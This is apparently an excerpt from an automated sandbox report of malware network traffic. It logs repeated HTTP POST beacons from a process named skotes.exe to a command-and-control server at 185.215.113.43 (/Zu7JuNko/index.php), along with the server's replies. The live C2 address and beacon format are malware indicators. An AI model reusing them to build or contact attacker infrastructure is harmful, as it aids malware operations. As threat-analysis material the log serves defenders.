                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                              Dec 31, 2024 09:49:12.388041019 CET196INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:49:12 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.649979185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:49:14.030733109 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 4
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 73 74 3d 73
                                                                                                              Data Ascii: st=s
                                                                                                              Dec 31, 2024 09:49:14.730952978 CET219INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:49:14 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Refresh: 0; url = Login.php
                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 1 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              7192.168.2.649993185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:49:16.247111082 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 160
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                              Dec 31, 2024 09:49:16.942919016 CET196INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:49:16 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              8192.168.2.650000185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:49:18.577122927 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 4
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 73 74 3d 73
                                                                                                              Data Ascii: st=s
                                                                                                              Dec 31, 2024 09:49:19.278074980 CET219INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:49:19 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Refresh: 0; url = Login.php
                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 1 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              9192.168.2.650002185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:49:20.793517113 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 160
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                              Dec 31, 2024 09:49:23.637319088 CET196INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:49:23 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              10192.168.2.650003185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:49:25.262285948 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 4
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 73 74 3d 73
                                                                                                              Data Ascii: st=s
                                                                                                              Dec 31, 2024 09:49:26.093508005 CET219INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:49:25 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Refresh: 0; url = Login.php
                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 1 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              11192.168.2.650004185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:49:27.644278049 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 160
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                              Dec 31, 2024 09:49:28.349101067 CET196INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:49:28 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              12192.168.2.650005185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:49:29.999681950 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 4
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 73 74 3d 73
                                                                                                              Data Ascii: st=s
                                                                                                              Dec 31, 2024 09:49:30.732076883 CET219INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:49:30 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Refresh: 0; url = Login.php
                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 1 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              13192.168.2.650006185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:49:32.248677015 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 160
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                              Dec 31, 2024 09:49:32.953929901 CET196INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:49:32 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              14192.168.2.650008185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:49:34.591372967 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 4
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 73 74 3d 73
                                                                                                              Data Ascii: st=s
                                                                                                              Dec 31, 2024 09:49:35.300867081 CET219INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:49:35 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Refresh: 0; url = Login.php
                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 1 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              15192.168.2.650009185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:49:36.809385061 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 160
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                              Dec 31, 2024 09:49:37.515782118 CET196INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:49:37 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              16192.168.2.650010185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:49:39.417922020 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 4
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 73 74 3d 73
                                                                                                              Data Ascii: st=s
                                                                                                              Dec 31, 2024 09:49:40.111429930 CET219INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:49:40 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Refresh: 0; url = Login.php
                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 1 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              17192.168.2.650011185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:49:41.621727943 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 160
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                              Dec 31, 2024 09:49:43.812731981 CET196INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:49:43 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              18192.168.2.650012185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:49:45.452210903 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 4
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 73 74 3d 73
                                                                                                              Data Ascii: st=s
                                                                                                              Dec 31, 2024 09:49:46.158930063 CET219INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:49:46 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Refresh: 0; url = Login.php
                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 1 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              19192.168.2.650013185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:49:47.668617964 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 160
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                              Dec 31, 2024 09:49:48.382879972 CET196INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:49:48 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              20192.168.2.650014185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:49:50.012197971 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 4
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 73 74 3d 73
                                                                                                              Data Ascii: st=s
                                                                                                              Dec 31, 2024 09:49:50.720453978 CET219INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:49:50 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Refresh: 0; url = Login.php
                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 1 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              21192.168.2.650015185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:49:52.329287052 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 160
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                              Dec 31, 2024 09:49:53.044357061 CET196INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:49:52 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              22192.168.2.650016185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:49:54.678767920 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 4
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 73 74 3d 73
                                                                                                              Data Ascii: st=s
                                                                                                              Dec 31, 2024 09:49:55.376422882 CET219INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:49:55 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Refresh: 0; url = Login.php
                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 1 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              23192.168.2.650017185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:49:56.887685061 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 160
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                                              Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                                              Dec 31, 2024 09:49:57.603605032 CET196INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:49:57 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 7 <c><d>0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              24192.168.2.650018185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:49:59.231152058 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 4
                                                                                                              Cache-Control: no-cache
                                                                                                              Data Raw: 73 74 3d 73
                                                                                                              Data Ascii: st=s
                                                                                                              Dec 31, 2024 09:49:59.931427956 CET219INHTTP/1.1 200 OK
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Tue, 31 Dec 2024 08:49:59 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Refresh: 0; url = Login.php
                                                                                                              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 1 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              25192.168.2.650020185.215.113.43804148C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Dec 31, 2024 09:50:01.451570988 CET314OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Host: 185.215.113.43
                                                                                                              Content-Length: 160
                                                                                                              Cache-Control: no-cache
